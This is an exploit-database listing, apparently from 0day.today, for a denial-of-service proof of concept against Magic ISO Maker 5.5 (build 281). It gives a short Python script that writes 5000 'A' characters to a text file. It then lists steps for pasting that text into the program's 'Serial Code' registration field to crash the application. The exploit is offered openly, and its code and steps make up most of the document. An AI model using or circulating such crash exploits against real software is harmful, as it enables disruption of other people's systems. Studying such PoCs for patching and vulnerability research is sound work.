Magic ISO Maker 5.5(build 281) - Serial Code Denial of Service Exploit

2019-04-04T00:00:00
ID 1337DAY-ID-32490
Type zdt
Reporter Alejandra Sánchez
Modified 2019-04-04T00:00:00

Description

Exploit for windows platform in category dos / poc

                                        
                                            # -*- coding: utf-8 -*-
# Exploit Title: Magic Iso Maker 5.5(build 281) - "Serial Code" Denial of Service (PoC)
# Author: Alejandra Sánchez
# Vendor Homepage: http://www.magiciso.com
# Software Link: http://www.magiciso.com/Setup_MagicISO.exe
# Version: 5.5(build 281)
# Tested on: Windows 10

# Proof of Concept:
# 1.- Run the python script "MagicIso.py", it will create a new file "MagicIso.txt"
# 2.- Copy the text from the generated MagicIso.txt file to clipboard
# 3.- Open MagicISO.exe
# 4.- Go to Register
# 5.- Write any name in the field "User Name", e.g "Anonymous"
# 6.- Paste clipboard in the field "Serial Code"
# 7.- Click on button -> Register!
# 8.- Crashed

buffer = "\x41" * 5000
f = open ("MagicIso.txt", "w")
f.write(buffer)
f.close()

#  0day.today [2019-04-04]  #